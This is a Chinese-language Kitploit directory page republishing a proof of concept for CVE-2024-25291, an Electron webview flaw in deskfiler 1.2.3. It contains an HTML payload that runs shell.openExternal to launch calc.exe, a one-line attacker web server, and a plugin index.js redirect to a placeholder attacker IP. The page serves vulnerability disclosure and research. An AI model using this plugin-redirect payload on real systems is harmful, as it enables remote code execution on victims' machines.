Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-25291 — deskfiler 1.2.3 Open Redirect exploit | Kitploit
工具/GitHubGitHub/eqstlab/cve-2024-25291
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubeqstlab/cve-2024-25291

CVE-2024-25291

deskfiler 1.2.3 Open Redirect exploit

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

DeskFiler RCE

CVE-2024-25291 漏洞的概念验证。

deskfiler - 1.2.3 允许在应用程序中使用 Electron webview,从而导致远程代码执行。 此仓库包含一个存在漏洞的示例应用程序及其概念验证(POC)利用代码。

作为 PoC,提供了一个自动执行该过程的 Python 文件。

1. 漏洞概述:

  • 漏洞主题:通过 RCE 进行开放重定向
  • 漏洞版本:deskfiler-1.2.3
  • 问题表现:Electron Webview
  • 攻击类型:远程代码执行
  • 攻击向量:要利用漏洞,必须有人打开插件。
  • 保留的 CVE 编号:CVE-2024-25291

2. 漏洞成因:

  • 利用说明
    • 可以确认在应用程序的某个特定部分,存在通过 Electron 的 Webview 访问外部链接的部分。因此,通过此方式,可以通过连接到攻击者的服务器来实现 RCE。

概念验证 (POC)

  • 步骤 1) 准备攻击者的服务器并制作恶意插件。
root@kitploit:~
<html>
 <head>
 <title>jruru</title>
 </head>
 <body>
 <script>
 const { shell } = require('electron');
 shell.openExternal('file:C:/Windows/System32/calc.exe');
 </script>
 </body>
 </html>

※ 如果要快速测试,请在攻击者的 PC 上使用以下代码创建服务器。

root@kitploit:~
$ python -m http.server 80

注意: ※ 此时,假设该插件是由攻击者生成的插件,并且只是一个添加了代码以允许攻击者服务器访问的正常插件。为简单测试选择了 BareBone。 deskfiler1

之后,在 BareBone 文件夹路径下的 index.js 文件中添加以下代码。

root@kitploit:~
window.location='http://[attacker_ip]/hack.html'
  • 步骤 2) 在受害者的服务器上,执行 Deskfiler,并通过“添加新插件”安装 BareBone 插件。 deskfiler2

deskfiler3


3. 附加信息

在此 PoC 中,我们使用了插件;但我们认为,通过其他攻击向量,也可以独立实现远程代码执行(RCE)。此外,如果存在存储型 XSS、反射型 XSS 等服务器端漏洞,RCE 同样被认为是可以实现的。

下载工具